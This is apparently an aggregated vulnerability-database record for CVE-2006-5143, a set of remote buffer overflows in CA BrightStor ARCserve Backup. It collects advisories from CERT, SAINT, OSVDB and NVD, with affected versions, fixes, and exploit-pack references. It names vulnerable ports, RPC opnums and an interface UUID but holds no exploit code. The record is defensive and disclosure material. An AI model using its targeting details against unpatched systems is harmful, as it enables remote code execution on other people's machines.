{"enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2017-04-28T13:20:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5143"]}, {"type": "cert", "idList": ["VU:860048", "VU:361792"]}, {"type": "saint", "idList": ["SAINT:F3E2F7DBC978E1EFC1903BAAFECC97D2", "SAINT:672F5439C31CDBDD093CEF54772E43DC", "SAINT:A6F8D23E499B7A2D3D64F8284674F95C", "SAINT:C973FD52CD02FDCC0CAFC5DDFB65EA6B", "SAINT:C66D96A3EE5E3D7ECAD91CB1BAC5CC54", "SAINT:D523B91C773D575ADDBF31529A6773B4"]}, {"type": "exploitdb", "idList": ["EDB-ID:28766", "EDB-ID:16401", "EDB-ID:28765"]}, {"type": "zdi", "idList": ["ZDI-06-030", "ZDI-06-031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82935"]}, {"type": "canvas", "idList": ["BRIGHTSTOR_MESSAGE"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/MESSAGE_ENGINE_HEAP"]}, {"type": "osvdb", "idList": ["OSVDB:29533", "OSVDB:29534", "OSVDB:31318"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:14569", "SECURITYVULNS:DOC:14566", "SECURITYVULNS:DOC:14773", "SECURITYVULNS:DOC:14570", "SECURITYVULNS:DOC:14567"]}, {"type": "nessus", "idList": ["ARCSERVE_WINDOWS_DBASVR_MULTIPLE.NASL", "ARCSERVE_WINDOWS_MULTIPLE.NASL"]}], "modified": "2017-04-28T13:20:26", "rev": 2}, "vulnersScore": 8.4}, "bulletinFamily": "software", "affectedSoftware": [], "references": [], "href": "https://vulners.com/osvdb/OSVDB:29535", "id": "OSVDB:29535", "title": "CA Multiple Product ASCORE.dll Long String Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:26", "edition": 1, "reporter": "OSVDB", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp)\n[Secunia Advisory ID:22285](https://secuniaresearch.flexerasoftware.com/advisories/22285/)\n[Related OSVDB ID: 29534](https://vulners.com/osvdb/OSVDB:29534)\n[Related OSVDB ID: 29533](https://vulners.com/osvdb/OSVDB:29533)\nOther Advisory URL: http://livesploit.com/advisories/LS-20060313.pdf\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-031.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0098.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0075.html\nKeyword: LS-20060313\nKeyword: TCP Port 6503\n[CVE-2006-5143](https://vulners.com/cve/CVE-2006-5143)\n", "modified": "2006-10-05T08:04:39", "viewCount": 1, "published": "2006-10-05T08:04:39", "cvelist": ["CVE-2006-5143"]}

{"cve": [{"lastseen": "2020-12-09T19:23:48", "description": "Multiple buffer overflows in CA BrightStor ARCserve Backup r11.5 SP1 and earlier, r11.1, and 9.01; BrightStor ARCserve Backup for Windows r11; BrightStor Enterprise Backup 10.5; Server Protection Suite r2; and Business Protection Suite r2 allow remote attackers to execute arbitrary code via crafted data on TCP port 6071 to the Backup Agent RPC Server (DBASVR.exe) using the RPC routines with opcode (1) 0x01, (2) 0x02, or (3) 0x18; invalid stub data on TCP port 6503 to the RPC routines with opcode (4) 0x2b or (5) 0x2d in ASCORE.dll in the Message Engine RPC Server (msgeng.exe); (6) a long hostname on TCP port 41523 to ASBRDCST.DLL in the Discovery Service (casdscsvc.exe); or unspecified vectors related to the (7) Job Engine Service.", "edition": 5, "cvss3": {}, "published": "2006-10-10T04:06:00", "title": "CVE-2006-5143", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5143"], "modified": "2018-10-17T21:41:00", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup:11.1", "cpe:/a:ca:brightstor_arcserve_backup:11.5", "cpe:/a:ca:brightstor_arcserve_backup:9.01", "cpe:/a:ca:server_protection_suite:2", "cpe:/a:ca:business_protection_suite:2.0", "cpe:/a:ca:brightstor_arcserve_backup:11", "cpe:/a:ca:brightstor_enterprise_backup:10.5"], "id": "CVE-2006-5143", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5143", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ca:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_enterprise_backup:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:11:*:windows:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:ca:business_protection_suite:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:server_protection_suite:2:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:11.5:sp1:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2019-05-29T17:19:20", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "**Name**| brightstor_message \n---|--- \n**CVE**| CVE-2006-5143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CA BrightStor ARCserve Backup RPC Interface Overflow \n**Notes**| CVE Name: CVE-2006-5143 \nVENDOR: Computer Associates \nNotes: \nPlatforms Tested: \nReferences: http://dvlabs.tippingpoint.com/advisory/TPTI-06-11 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143 \nDate public: 10/05/06 \nCVSS: 7.5 \n\n", "edition": 2, "modified": "2006-10-10T04:06:00", "published": "2006-10-10T04:06:00", "id": "BRIGHTSTOR_MESSAGE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/brightstor_message", "type": "canvas", "title": "Immunity Canvas: BRIGHTSTOR_MESSAGE", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "Added: 11/09/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29535](<http://www.osvdb.org/29535>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) family of products includes a Message Engine which listens for connections on port 6503/TCP. \n\n### Problem\n\nA buffer overflow in the `**ASCORE.dll**` library allows remote attackers to execute arbitrary commands when a specially crafted request is processed by the Message Engine RPC server. \n\n### Resolution\n\nApply the upgrade referenced in the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0098.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.5. Due to the nature of the vulnerability, the success of this exploit may depend on the system state at the time the exploit is run. \n\n### Platforms\n\nWindows 2000 SP4 \nWindows 2000 SP4 / Windows 2000 \nWindows 2000 SP3 \n \n\n", "edition": 1, "modified": "2006-11-09T00:00:00", "published": "2006-11-09T00:00:00", "id": "SAINT:F3E2F7DBC978E1EFC1903BAAFECC97D2", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_ascore", "type": "saint", "title": "BrightStor ARCserve Message Engine RPC server buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "Added: 10/19/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29534](<http://www.osvdb.org/29534>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted TCP packet to the discovery service. \n\n### Resolution\n\nApply the update referenced in Computer Associates' [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-06-030.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "edition": 1, "modified": "2006-10-19T00:00:00", "published": "2006-10-19T00:00:00", "id": "SAINT:A6F8D23E499B7A2D3D64F8284674F95C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_asbrdcst", "type": "saint", "title": "BrightStor ARCserve discovery service ASBRDCST.DLL buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "Added: 11/09/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29535](<http://www.osvdb.org/29535>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) family of products includes a Message Engine which listens for connections on port 6503/TCP. \n\n### Problem\n\nA buffer overflow in the `**ASCORE.dll**` library allows remote attackers to execute arbitrary commands when a specially crafted request is processed by the Message Engine RPC server. \n\n### Resolution\n\nApply the upgrade referenced in the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0098.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.5. Due to the nature of the vulnerability, the success of this exploit may depend on the system state at the time the exploit is run. \n\n### Platforms\n\nWindows 2000 SP4 \nWindows 2000 SP4 / Windows 2000 \nWindows 2000 SP3 \n \n\n", "edition": 4, "modified": "2006-11-09T00:00:00", "published": "2006-11-09T00:00:00", "id": "SAINT:C973FD52CD02FDCC0CAFC5DDFB65EA6B", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_ascore", "title": "BrightStor ARCserve Message Engine RPC server buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "edition": 2, "description": "Added: 11/09/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29535](<http://www.osvdb.org/29535>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) family of products includes a Message Engine which listens for connections on port 6503/TCP. \n\n### Problem\n\nA buffer overflow in the `**ASCORE.dll**` library allows remote attackers to execute arbitrary commands when a specially crafted request is processed by the Message Engine RPC server. \n\n### Resolution\n\nApply the upgrade referenced in the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0098.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.5. Due to the nature of the vulnerability, the success of this exploit may depend on the system state at the time the exploit is run. \n\n### Platforms\n\nWindows 2000 SP4 \nWindows 2000 SP4 / Windows 2000 \nWindows 2000 SP3 \n \n\n", "modified": "2006-11-09T00:00:00", "published": "2006-11-09T00:00:00", "id": "SAINT:672F5439C31CDBDD093CEF54772E43DC", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_ascore", "type": "saint", "title": "BrightStor ARCserve Message Engine RPC server buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "edition": 2, "description": "Added: 10/19/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29534](<http://www.osvdb.org/29534>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted TCP packet to the discovery service. \n\n### Resolution\n\nApply the update referenced in Computer Associates' [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-06-030.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2006-10-19T00:00:00", "published": "2006-10-19T00:00:00", "id": "SAINT:C66D96A3EE5E3D7ECAD91CB1BAC5CC54", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_asbrdcst", "type": "saint", "title": "BrightStor ARCserve discovery service ASBRDCST.DLL buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "Added: 10/19/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29534](<http://www.osvdb.org/29534>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted TCP packet to the discovery service. \n\n### Resolution\n\nApply the update referenced in Computer Associates' [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-06-030.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "edition": 4, "modified": "2006-10-19T00:00:00", "published": "2006-10-19T00:00:00", "id": "SAINT:D523B91C773D575ADDBF31529A6773B4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_asbrdcst", "title": "BrightStor ARCserve discovery service ASBRDCST.DLL buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp)\n[Secunia Advisory ID:22285](https://secuniaresearch.flexerasoftware.com/advisories/22285/)\n[Related OSVDB ID: 29534](https://vulners.com/osvdb/OSVDB:29534)\n[Related OSVDB ID: 29535](https://vulners.com/osvdb/OSVDB:29535)\nOther Advisory URL: http://livesploit.com/advisories/LS-20060330.pdf\nOther Advisory URL: http://www.tippingpoint.com/security/advisories/TSRT-06-11.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0101.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0075.html\nKeyword: LS-20060330\nKeyword: TCP Port 6071\n[CVE-2006-5143](https://vulners.com/cve/CVE-2006-5143)\n", "modified": "2006-10-05T08:04:39", "published": "2006-10-05T08:04:39", "href": "https://vulners.com/osvdb/OSVDB:29533", "id": "OSVDB:29533", "title": "CA Multiple Product DBASVR.exe Multiple RPC Routine Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp)\n[Secunia Advisory ID:22285](https://secuniaresearch.flexerasoftware.com/advisories/22285/)\n[Related OSVDB ID: 29533](https://vulners.com/osvdb/OSVDB:29533)\n[Related OSVDB ID: 29535](https://vulners.com/osvdb/OSVDB:29535)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-030.html\nOther Advisory URL: http://livesploit.com/advisories/LS-20060220.pdf\nOther Advisory URL: http://www.lssec.com/advisories/LS-20060220.pdf\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0097.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0075.html\nKeyword: UDP Port 41524\nKeyword: ZDI-06-030\nKeyword: TCP Port 41523\nKeyword: LS-20060220\n[CVE-2006-5143](https://vulners.com/cve/CVE-2006-5143)\n", "modified": "2006-10-05T08:04:39", "published": "2006-10-05T08:04:39", "href": "https://vulners.com/osvdb/OSVDB:29534", "id": "OSVDB:29534", "title": "CA Multiple Product ASBRDCST.DLL (casdscsvc.exe) Hostname Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-0169", "CVE-2006-5143"], "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp)\n[Secunia Advisory ID:23648](https://secuniaresearch.flexerasoftware.com/advisories/23648/)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-07-003.html\nOther Advisory URL: http://www.lssec.com/advisories/LS-20060330.pdf\nOther Advisory URL: http://www.lssec.com/advisories/LS-20060313.pdf\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-031.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0093.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0088.html\nMail List Post: http://archives.neohapsis.com/archives/vuln-dev/2007-q1/0021.html\nMail List Post: http://archives.neohapsis.com/archives/vuln-dev/2007-q1/0011.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0340.html\nKeyword: Opnum 45\nKeyword: Opnum 43\nKeyword: TCP Port 6503\nKeyword: dc246bf0-7a7a-11ce-9f88-00805fe43838\n\n[CVE-2007-0169](https://vulners.com/cve/CVE-2007-0169)\n[CVE-2006-5143](https://vulners.com/cve/CVE-2006-5143)\n", "edition": 1, "modified": "2006-10-07T11:24:18", "published": "2006-10-07T11:24:18", "href": "https://vulners.com/osvdb/OSVDB:31318", "id": "OSVDB:31318", "title": "CA BrightStor ARCserve Backup ASCORE.dll (msgeng.exe) Multiple RPC Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:42:58", "bulletinFamily": "info", "cvelist": ["CVE-2006-5143"], "description": "### Overview \n\nMultiple vulnerabilities exist in Computer Associates backup products. If successfully exploited, these vulnerabilities may allow an attacker to execute arbitrary code.\n\n### Description \n\n[BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) is a backup and data retention tool that integrates with other BrightStor Data Availability and BrightStor Storage Management solutions. [Computer Associates Protection Suites](<http://www3.ca.com/smb/solution.aspx?id=5312>) offer multiple Computer Associates security and data recovery products in a single package. \n\nBrightStor and CA (Computer Associates) Protection Suite products contain multiple buffer overflow vulnerabilities due to incorrect handling of RPC requests. These overflows may be exploited by sending a malformed RPC request with Opnum 43 `(``port 6503/tcp``)` or Opnum 45 `(port 6503/tcp``) `to a vulnerable system. \n \nNote that only the Microsoft Windows versions of Computer Associates products are affected by this vulnerability. \n \nFor more information, including a list of affected products, refer to the Computer Associates[ Security Advisory](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with SYSTEM privileges. \n \n--- \n \n### Solution \n\n**Upgrade** \nAccording to [Computer Associates](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>): \n_Customers with vulnerable versions of the BrightStor ARCserve Backup products should upgrade to the latest versions which will be available for download from _[_http://supportconnect.ca.com_](<http://supportconnect.ca.com>)_ on or before October 5._ \n \n--- \n \n \n**Restrict Access** \n \nRestricting access to port `6503/tcp` at the network perimeter may mitigate the impact of this vulnerability. \n \n--- \n \n### Vendor Information\n\n860048\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: November 02, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [_http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp_](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23860048 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.tippingpoint.com/security/advisories/TSRT-06-11.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-030.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-031.html>\n * <http://www.lssec.com/advisories/LS-20060220.pdf>\n * <http://www.lssec.com/advisories/LS-20060313.pdf>\n * <http://www.lssec.com/advisories/LS-20060330.pdf>\n * <http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693>\n * <http://www.securityfocus.com/bid/20365>\n * <http://www.frsirt.com/english/advisories/2006/3930>\n * <http://securitytracker.com/id?1017003>\n * <http://securitytracker.com/id?1017004>\n * <http://securitytracker.com/id?1017005>\n * <http://securitytracker.com/id?1017006>\n * <http://xforce.iss.net/xforce/xfdb/29364>\n\n### Acknowledgements\n\nThis vulnerability was reported by the TippingPoint and the Zero Day Initiative. TippingPoint credits LSsecurity with reporting this vulnerability.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-5143](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-5143>) \n---|--- \n**Severity Metric:** | 0.28 \n**Date Public:** | 2006-10-05 \n**Date First Published:** | 2006-11-02 \n**Date Last Updated: ** | 2007-02-06 20:29 UTC \n**Document Revision: ** | 48 \n", "modified": "2007-02-06T20:29:00", "published": "2006-11-02T00:00:00", "id": "VU:860048", "href": "https://www.kb.cert.org/vuls/id/860048", "type": "cert", "title": "Computer Associates BrightStor ARCserv and Protection Suite products RPC buffer overflow vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T20:42:58", "bulletinFamily": "info", "cvelist": ["CVE-2006-5143"], "description": "### Overview \n\nMultiple Computer Associates products contain a buffer overflow in the code that handles the Discovery Service protocol. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup, BrightStor Enterprise Backup, CA Server Protection Suite, and CA Business Protection Suite software use a protocol known as the Discovery Service to find other BrightStor and Protection Suite installations. A lack of validation on Discovery Service packets may allow a buffer overflow to occur. \n\nThis vulnerability only affects Computer Associates BrightStor ARCserve and Protection Suite products for the Microsoft Windows platform. \n \nFor more information, including a list of affected products, refer to the Computer Associates BrightStor ARCserve Backup [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with `SYSTEM` privileges. \n \n--- \n \n### Solution \n\n**Upgrade** \nAccording to Computer Associates: \n \n_Customers with vulnerable versions of the BrightStor ARCserve Backup products should upgrade to the latest versions which will be available for download from _[__http://supportconnect.ca.com__](<http://supportconnect.ca.com/>)_ on or before October 5. _ \n \n--- \n \n**Restrict Access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Discovery Service protocol (typically ports 41524/udp and 41523/tcp). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n361792\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: November 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23361792 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.tippingpoint.com/security/advisories/TSRT-06-11.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-030.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-031.html>\n * <http://www.lssec.com/advisories/LS-20060220.pdf>\n * <http://www.lssec.com/advisories/LS-20060313.pdf>\n * <http://www.lssec.com/advisories/LS-20060330.pdf>\n * <http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>\n * [http://www3.ca.com/securityadvisor/blogs/posting.aspx?pid=93775&amp;id=90744 ](<http://www3.ca.com/securityadvisor/blogs/posting.aspx?pid=93775&id=90744 >)\n * [http://www3.ca.com/securityadvisor/blogs/posting.aspx?pid=94397&amp;id=90744 ](<http://www3.ca.com/securityadvisor/blogs/posting.aspx?pid=94397&id=90744 >)\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693>\n * <http://www.securityfocus.com/bid/20365>\n * <http://www.frsirt.com/english/advisories/2006/3930>\n * <http://securitytracker.com/id?1017003>\n * <http://securitytracker.com/id?1017004>\n * <http://securitytracker.com/id?1017005>\n * <http://securitytracker.com/id?1017006>\n * <http://xforce.iss.net/xforce/xfdb/29364>\n\n### Acknowledgements\n\nThis vulnerability was reported by the TippingPoint and the Zero Day Initiative. TippingPoint credits LSsecurity with reporting this vulnerability.\n\nThis document was written by Jeff Gennari based on information from LSsecurity.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-5143](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-5143>) \n---|--- \n**Severity Metric:** | 16.54 \n**Date Public:** | 2006-10-05 \n**Date First Published:** | 2006-11-01 \n**Date Last Updated: ** | 2007-01-12 21:37 UTC \n**Document Revision: ** | 33 \n", "modified": "2007-01-12T21:37:00", "published": "2006-11-01T00:00:00", "id": "VU:361792", "href": "https://www.kb.cert.org/vuls/id/361792", "type": "cert", "title": "Computer Associates Discovery Service buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T08:52:39", "description": "Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (1). CVE-2006-5143. Remote exploit for windows platform", "published": 